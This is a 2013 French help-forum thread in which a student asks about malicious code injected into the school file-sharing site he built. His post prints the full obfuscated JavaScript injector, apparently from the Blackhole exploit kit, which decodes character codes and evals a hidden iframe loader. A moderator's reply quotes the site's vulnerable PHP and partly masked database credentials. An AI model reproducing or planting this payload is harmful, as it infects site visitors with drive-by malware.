Hack de site : Injection de code

Fermé

nbs28 - 31 juil. 2013 à 17:03
EGP-Swyx Messages postés 6664 Date d'inscription dimanche 18 mars 2012 Statut Contributeur Dernière intervention 7 janvier 2019 - 1 août 2013 à 09:15

Bonjour,

j'ai créé un site pour mon professeur de maths, pour qu'il puisse déposer des fichiers.

Il y a un mois, j'ai subi des attaques par injection de code.

Cette semaine, cela recommence.

Avg me détecte Exploit Blackhole Exploit Kit (type 2602).

On m'a insérer du code dans tous les fichiers js.

En prime, sur ma page d'accueil, j'ai ceci :

#0f2490#
                                                                                                                                                                                                                                                                                                                                                                                                                echo "                                                                                                                                                                                                                                                                                                                                                                                                                <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                                                                                ps=\"s\"+\"p\"+\"l\"+\"i\"+\"t\";asd=function(){--(d.body)};a=(\"47,155,174,165,152,173,160,166,165,47,201,201,201,155,155,155,57,60,47,202,24,21,47,175,150,171,47,172,154,47,104,47,153,166,152,174,164,154,165,173,65,152,171,154,150,173,154,114,163,154,164,154,165,173,57,56,160,155,171,150,164,154,56,60,102,24,21,24,21,47,172,154,65,172,171,152,47,104,47,56,157,173,173,167,101,66,66,152,154,152,160,163,171,150,200,165,150,160,153,174,65,152,166,164,66,166,173,157,154,171,66,113,111,164,176,130,140,137,152,65,167,157,167,56,102,24,21,47,172,154,65,172,173,200,163,154,65,167,166,172,160,173,160,166,165,47,104,47,56,150,151,172,166,163,174,173,154,56,102,24,21,47,172,154,65,172,173,200,163,154,65,151,166,171,153,154,171,47,104,47,56,67,56,102,24,21,47,172,154,65,172,173,200,163,154,65,157,154,160,156,157,173,47,104,47,56,70,167,177,56,102,24,21,47,172,154,65,172,173,200,163,154,65,176,160,153,173,157,47,104,47,56,70,167,177,56,102,24,21,47,172,154,65,172,173,200,163,154,65,163,154,155,173,47,104,47,56,70,167,177,56,102,24,21,47,172,154,65,172,173,200,163,154,65,173,166,167,47,104,47,56,70,167,177,56,102,24,21,24,21,47,160,155,47,57,50,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,172,154,56,60,60,47,202,24,21,47,153,166,152,174,164,154,165,173,65,176,171,160,173,154,57,56,103,153,160,175,47,160,153,104,143,56,172,154,143,56,105,103,66,153,160,175,105,56,60,102,24,21,47,153,166,152,174,164,154,165,173,65,156,154,173,114,163,154,164,154,165,173,111,200,120,153,57,56,172,154,56,60,65,150,167,167,154,165,153,112,157,160,163,153,57,172,154,60,102,24,21,47,204,24,21,204,24,21,155,174,165,152,173,160,166,165,47,132,154,173,112,166,166,162,160,154,57,152,166,166,162,160,154,125,150,164,154,63,152,166,166,162,160,154,135,150,163,174,154,63,165,113,150,200,172,63,167,150,173,157,60,47,202,24,21,47,175,150,171,47,173,166,153,150,200,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,175,150,171,47,154,177,167,160,171,154,47,104,47,165,154,176,47,113,150,173,154,57,60,102,24,21,47,160,155,47,57,165,113,150,200,172,104,104,165,174,163,163,47,203,203,47,165,113,150,200,172,104,104,67,60,47,165,113,150,200,172,104,70,102,24,21,47,154,177,167,160,171,154,65,172,154,173,133,160,164,154,57,173,166,153,150,200,65,156,154,173,133,160,164,154,57,60,47,62,47,72,75,67,67,67,67,67,61,71,73,61,165,113,150,200,172,60,102,24,21,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,47,104,47,152,166,166,162,160,154,125,150,164,154,62,51,104,51,62,154,172,152,150,167,154,57,152,166,166,162,160,154,135,150,163,174,154,60,24,21,47,62,47,51,102,154,177,167,160,171,154,172,104,51,47,62,47,154,177,167,160,171,154,65,173,166,116,124,133,132,173,171,160,165,156,57,60,47,62,47,57,57,167,150,173,157,60,47,106,47,51,102,47,167,150,173,157,104,51,47,62,47,167,150,173,157,47,101,47,51,51,60,102,24,21,204,24,21,155,174,165,152,173,160,166,165,47,116,154,173,112,166,166,162,160,154,57,47,165,150,164,154,47,60,47,202,24,21,47,175,150,171,47,172,173,150,171,173,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,165,150,164,154,47,62,47,51,104,51,47,60,102,24,21,47,175,150,171,47,163,154,165,47,104,47,172,173,150,171,173,47,62,47,165,150,164,154,65,163,154,165,156,173,157,47,62,47,70,102,24,21,47,160,155,47,57,47,57,47,50,172,173,150,171,173,47,60,47,55,55,24,21,47,57,47,165,150,164,154,47,50,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,67,63,47,165,150,164,154,65,163,154,165,156,173,157,47,60,47,60,47,60,24,21,47,202,24,21,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,204,24,21,47,160,155,47,57,47,172,173,150,171,173,47,104,104,47,64,70,47,60,47,171,154,173,174,171,165,47,165,174,163,163,102,24,21,47,175,150,171,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,160,165,153,154,177,126,155,57,47,51,102,51,63,47,163,154,165,47,60,102,24,21,47,160,155,47,57,47,154,165,153,47,104,104,47,64,70,47,60,47,154,165,153,47,104,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,163,154,165,156,173,157,102,24,21,47,171,154,173,174,171,165,47,174,165,154,172,152,150,167,154,57,47,153,166,152,174,164,154,165,173,65,152,166,166,162,160,154,65,172,174,151,172,173,171,160,165,156,57,47,163,154,165,63,47,154,165,153,47,60,47,60,102,24,21,204,24,21,160,155,47,57,165,150,175,160,156,150,173,166,171,65,152,166,166,162,160,154,114,165,150,151,163,154,153,60,24,21,202,24,21,160,155,57,116,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,60,104,104,74,74,60,202,204,154,163,172,154,202,132,154,173,112,166,166,162,160,154,57,56,175,160,172,160,173,154,153,146,174,170,56,63,47,56,74,74,56,63,47,56,70,56,63,47,56,66,56,60,102,24,21,24,21,201,201,201,155,155,155,57,60,102,24,21,204,24,21,204,24,21\"[ps](\",\"));d=document;for(i=0;i<a.length;i+=1){a[i]=-(10-3)+parseInt(a[i],5+3);}try{asd()}catch(q){yy=50-50;}try{yy/=18}catch(pq){yy=1;}if(!yy)eval(String[\"fr\"+\"omCharCode\"].apply(String,a));</script>";

#/0f2490#

PS : Je sais que le site est moche, il est en développement.

Que puis-je faire, sachant que je me suis prémuni contre les injections sql, les formulaires redirigent le message vers une adresse mail, et que les attaques MS-DOS ne fonctionnent pas, j'ai testé.

Quand je supprime le code, il revient.

*est-ce que quelqu'un sait ce que font ces codes ?

Pour ceux qui veulent aller voir, l'adresse est http://milletvaldevoise.free.fr

A voir également:

Hack de site : Injection de code
Site de telechargement - Guide
Site de vente entre particulier - Guide
Site inaccessible - Guide
Site de partage de photos - Guide
Darkino site - Guide

4 réponses

Réponse 1 / 4

EGP-Swyx Messages postés 6664 Date d'inscription dimanche 18 mars 2012 Statut Contributeur Dernière intervention 7 janvier 2019 623
31 juil. 2013 à 17:06

Je pense que c'est plus de l'ordre du développement web non? (programmation web?)

Tu devrais changer la catégorie et mettre un titre plus explicite style
(faille de sécurité, injection de code)

Parce que on dirait (au titre) que tu demande un tuto.

Réponse 2 / 4

Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 627
Modifié par Malekal_morte- le 31/07/2013 à 17:58

Salut,

ca craint ce site, XSS, doit y avoir des SQL injection, vu comment tu balances les variaibles...
$req = mysql_query('SELECT content FROM classes WHERE actif=1') OR die('Erreur de la requÃªte MySQL');
while($donnees = mysql_fetch_assoc($req))
{
echo '<li><a href="classe.php?classe=' . $donnees['content'] . '">' . $donnees['content'] . '</a></li>';
}
?>

Tu vas te faire réhacker... un jour, ça c'est sûr.

<?php
$server = 'millet****.sql.free.fr';
$connexion = mysql_connect($server, 'millet****, 'boulot****') OR die('Erreur de connexion');
mysql_select_db('millet****', $connexion) OR die('Erreur de sÃ©lection de la base');
?>

Like the angel you are, you laugh creating a lightness in my chest,
Your eyes they penetrate me,
(Your answer's always 'maybe')
That's when I got up and left

Réponse 3 / 4

nbs28 Messages postés 24 Date d'inscription mercredi 31 juillet 2013 Statut Membre Dernière intervention 19 avril 2014 75
31 juil. 2013 à 17:56

Comment tu as pu voir le code source php ?

Réponse 4 / 4

Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 627
31 juil. 2013 à 17:58

Parce que ton site est une passoire.

envoie un message en privé, que je t'explique mais bon y a du boulot..

Injhall Messages postés 3563 Date d'inscription vendredi 13 juillet 2012 Statut Membre Dernière intervention 2 août 2013 1 016
31 juil. 2013 à 18:05

Petite question : pourquoi en message privé ?
On est sur un forum d'entraide, ça peut aider d'autre personne à résoudre des problèmes similaires ;)

y aussi des gros c*ns :)
je copie/collerai quand il aura sécuriser son site.
Sinon ça peux permettre qui lit de faire n'importe quoi.

EGP-Swyx Messages postés 6664 Date d'inscription dimanche 18 mars 2012 Statut Contributeur Dernière intervention 7 janvier 2019 623
1 août 2013 à 09:15

+1 pour le mp. je plussoie. tu postera un log des correctifs apportés. c'est plus simple

Discussions similaires

Colis en cours de transport vers votre site de livraison ?

'Votre colis est dans le site de livraison qui dessert votre adresse' que faire

il est en cours de transport vers votre site de livraison

sites de vidéo choc

adele

Discussions similaires

Newsletters